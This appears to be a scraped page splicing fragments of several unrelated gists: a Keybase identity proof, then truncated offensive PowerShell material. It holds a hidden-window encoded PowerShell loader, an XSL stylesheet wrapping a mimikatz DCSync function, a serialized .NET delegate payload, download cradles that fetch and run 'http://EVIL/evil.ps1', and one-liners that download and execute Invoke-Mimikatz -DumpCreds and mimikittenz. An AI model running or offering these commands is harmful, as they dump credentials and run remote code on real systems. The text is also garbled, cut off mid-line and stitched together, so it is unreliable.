I hereby claim:
- I am ajohnston9 on github.
- I am ahjohnston25 (https://keybase.io/ahjohnston25) on keybase.
- I have a public key ASCXXr2gkURRlYnXF9QyX6lBTbQU9jESEUh6G3bqBTEnxQo
To claim this, I am signing this object:
alert(1); |
powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBhADQAKwBpAFQAQgBiACsAMwBQADAAcgArAEQAQwBKAG0AbgBhADgAdABvADcAOQBKAHAATwA4AGcASwBMAFkAdwBJAGcASQBYAG4AbwA3AEgAWQBRAFMAUwBvAHQATABjAHgATgA4ADkALwAzAHYAZQB3AHEAMQBwADIAZQBuAFoAMwBlAFMAWABSAEoAUwBWAFYAQwBuAHoAbgBPAGUAYwA2AG0AagBvAGUAUwB6AGwAawBUAFkAUwB1AFQAQQBSAHMAeABuAEEAMABVAHgARABuAHkAbQBjADMAdQA3AFMAMwAwAHIAbwBYAE0ANgBlAFgARgBRADgAaABKAEcAZwBmAFYAaQAyAG4AYQBFADQAcABqADUANgAvAFoAbQBaAGsAYQBtAHgAMQBRAC8AWgBXAGIAMAA0AGcAVgAyAFMAbABDAGQASwBSAGQAMABJADcATABUAEMATgBWAHUAYgBtADUAdgB5AGsAKwBwAEgANQBzADcAOQBPAEsAYgBDAGMANwBRAGkANABjAFMATgA3AEIAagA1AGkAdABUAGYAVwBMAEQAYwBCAGgANABKAHYAYQBmAC8ALwBpAEQAVAA2AE0ASQArAGMAbAA1ADMAUgBpAGoAaABJADEAagA1AEcAMABKAFIAbgBHADEAeAB2AHkAVABXAGIAbwBvAFEAcAArAC8AYgBmAGYASQBTAHAAaQAvAG0ARQA4AHYAagBUAEUASgB0AGkAYQA1AGIAQwB0ADQAMAAzAEwAQgBDAHQAYQAzAD |
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:vb="urn:the-xml-files:xslt-vb" xmlns:user="placeholder" version="1.0"> | |
<!-- Copyright (c) Microsoft Corporation. All rights reserved. --> | |
<xsl:output method="text" omit-xml-declaration="yes" indent="no"/> | |
<xsl:strip-space elements="*" /> | |
<ms:script implements-prefix="user" language="JScript"> | |
<![CDATA[ | |
function Invoke-DCSync | |
{ | |
<# | |
.SYNOPSIS | |
Uses dcsync from mimikatz to collect NTLM hashes from the domain. | |
Author: @monoxgas | |
Improved by: @harmj0y |
var serialized_obj = [ | |
0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108, | |
101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108, | |
101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46, | |
68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101, | |
103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105, | |
122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77, | |
101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0, |
# normal download cradle | |
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
# PowerShell 3.0+ | |
IEX (iwr 'http://EVIL/evil.ps1') | |
# hidden IE com object | |
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
# Msxml2.XMLHTTP COM object |
I hereby claim:
To claim this, I am signing this object:
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!* | |
#mimikatz | |
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds | |
#encoded-mimikatz | |
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA== | |
#mimikittenz | |
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-m |